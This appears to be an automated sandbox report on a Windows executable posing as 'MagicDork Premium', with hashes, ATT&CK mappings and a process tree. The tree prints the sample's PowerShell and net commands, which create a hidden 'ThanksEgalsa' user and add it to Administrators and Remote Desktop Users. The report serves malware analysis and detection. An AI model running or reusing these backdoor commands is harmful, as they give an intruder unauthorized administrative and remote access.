90df211fe009f950d2f0a903bf2a2e609788b2d9d5183a28aab02c528ee8d505

Analysis

max time kernel
13s
max time network
13s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 13:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MagicDork Premium v3.4.5.exe
Size

8KB
MD5

bc4bc3abc2a6c7008ba586394e653f6a
SHA1

a213a27ad4d756506e7a8b581ee6686031c70610
SHA256

90df211fe009f950d2f0a903bf2a2e609788b2d9d5183a28aab02c528ee8d505
SHA512

e52a45671658725444e3b6cb72547f942b831274980f239f8e6a7899dd9506538ccd3616532f1492a94c1f47a2c09fd9f88480f615da61039fa604223f280b8d
SSDEEP

96:yp+bNXPhviNjOi4cBmdjS+d579i9bm605/ltk+Vdc0M1ks5OaczNtK:ykZXRikFdm+f96bmzZNdfMOs1m

Score

9^/10

discovery lateral_movement

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 1 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1748	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	MagicDork Premium v3.4.5.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MagicDork Premium v3.4.5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3268	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2896	powershell.exe
2896	powershell.exe
1188	powershell.exe
1188	powershell.exe
1748	powershell.exe
1748	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	4260	MagicDork Premium v3.4.5.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 2896	4260	MagicDork Premium v3.4.5.exe	82
PID 4260 wrote to memory of 2896	4260	MagicDork Premium v3.4.5.exe	82
PID 4260 wrote to memory of 2896	4260	MagicDork Premium v3.4.5.exe	82
PID 2896 wrote to memory of 4024	2896	powershell.exe	84
PID 2896 wrote to memory of 4024	2896	powershell.exe	84
PID 2896 wrote to memory of 4024	2896	powershell.exe	84
PID 4024 wrote to memory of 3984	4024	net.exe	85
PID 4024 wrote to memory of 3984	4024	net.exe	85
PID 4024 wrote to memory of 3984	4024	net.exe	85
PID 4260 wrote to memory of 1188	4260	MagicDork Premium v3.4.5.exe	86
PID 4260 wrote to memory of 1188	4260	MagicDork Premium v3.4.5.exe	86
PID 4260 wrote to memory of 1188	4260	MagicDork Premium v3.4.5.exe	86
PID 1188 wrote to memory of 1960	1188	powershell.exe	88
PID 1188 wrote to memory of 1960	1188	powershell.exe	88
PID 1188 wrote to memory of 1960	1188	powershell.exe	88
PID 1960 wrote to memory of 3556	1960	net.exe	89
PID 1960 wrote to memory of 3556	1960	net.exe	89
PID 1960 wrote to memory of 3556	1960	net.exe	89
PID 4260 wrote to memory of 1748	4260	MagicDork Premium v3.4.5.exe	90
PID 4260 wrote to memory of 1748	4260	MagicDork Premium v3.4.5.exe	90
PID 4260 wrote to memory of 1748	4260	MagicDork Premium v3.4.5.exe	90
PID 1748 wrote to memory of 2236	1748	powershell.exe	92
PID 1748 wrote to memory of 2236	1748	powershell.exe	92
PID 1748 wrote to memory of 2236	1748	powershell.exe	92
PID 2236 wrote to memory of 2120	2236	net.exe	93
PID 2236 wrote to memory of 2120	2236	net.exe	93
PID 2236 wrote to memory of 2120	2236	net.exe	93
PID 4260 wrote to memory of 5076	4260	MagicDork Premium v3.4.5.exe	95
PID 4260 wrote to memory of 5076	4260	MagicDork Premium v3.4.5.exe	95
PID 4260 wrote to memory of 5076	4260	MagicDork Premium v3.4.5.exe	95
PID 5076 wrote to memory of 3268	5076	cmd.exe	97
PID 5076 wrote to memory of 3268	5076	cmd.exe	97
PID 5076 wrote to memory of 3268	5076	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\MagicDork Premium v3.4.5.exe
"C:\Users\Admin\AppData\Local\Temp\MagicDork Premium v3.4.5.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net user ThanksEgalsa ThanksEgalsa /add
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" user ThanksEgalsa ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ThanksEgalsa ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3984
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup administrators ThanksEgalsa /add
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3556
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup "Remote Desktop Users" ThanksEgalsa /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Remote Desktop Users ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBB12.tmp.cmd""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5076
- - C:\Windows\SysWOW64\timeout.exe
    timeout 4
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:3268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
5a429fa94e3aea10b7a233d763fef16c

SHA1
bcccaef577b7ccc0dac979bdedc2faa30472ddea

SHA256
521778ff46de3bd3834a11d329d7300dd5d5860edbb4774f5b4e31474d12be79

SHA512
c768a87c980da1012bbfcd0f2ae6e5c13329924f8fff639050c94387b2efbbd7c16391be2aac4697b73be07b412156ac77ab560affc2cd2dbba3a8c4dadc3c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
597d5456dce849f29a5869d8d4309e0f

SHA1
e4ea02c2f428b082c6fc3fc3f5b500e8b1985aba

SHA256
89f12b90fce2bae2db2fd7939bea7775ad8bdd3d41700e282874008ed3d99250

SHA512
669f4b575b814b1021b20c0773ec48e525f771ad63ed4f97ddc9d76f451641be3cac2426f9ff99e22d1ace25a869ec0cb968f832267b0bdbfee1988b9cc60572

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j0fqo01f.cre.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBB12.tmp.cmd

Filesize
170B

MD5
84db9f8ba58f94110128990057d87071

SHA1
be13e5fadf2fc616e3eeab0e1a823af58c6c3762

SHA256
959c4da8a942fcec72e27a55226cf4e0dca69a8213dd93febdd5bc998decf4b4

SHA512
7c6efb69613012fc17e193684b809c655b31fc8d05a750dca4a130883820418874fdc33aaf6234326770bb3c45c1f5e619291d9c913c9212f79ae36061ff6b73

Download Submit
memory/1188-26-0x0000000006260000-0x00000000065B4000-memory.dmp

Filesize
3.3MB

Download
memory/1748-38-0x00000000058F0000-0x0000000005C44000-memory.dmp

Filesize
3.3MB

Download
memory/2896-9-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/2896-3-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/2896-5-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/2896-19-0x0000000005910000-0x0000000005C64000-memory.dmp

Filesize
3.3MB

Download
memory/2896-20-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

Filesize
120KB

Download
memory/2896-21-0x0000000005E10000-0x0000000005E5C000-memory.dmp

Filesize
304KB

Download
memory/2896-24-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/2896-8-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/2896-4-0x0000000005090000-0x00000000056B8000-memory.dmp

Filesize
6.2MB

Download
memory/2896-2-0x0000000002490000-0x00000000024C6000-memory.dmp

Filesize
216KB

Download
memory/2896-7-0x0000000004F20000-0x0000000004F42000-memory.dmp

Filesize
136KB

Download
memory/2896-6-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4260-1-0x0000000000420000-0x0000000000428000-memory.dmp

Filesize
32KB

Download
memory/4260-0-0x00000000746DE000-0x00000000746DF000-memory.dmp

Filesize
4KB

Download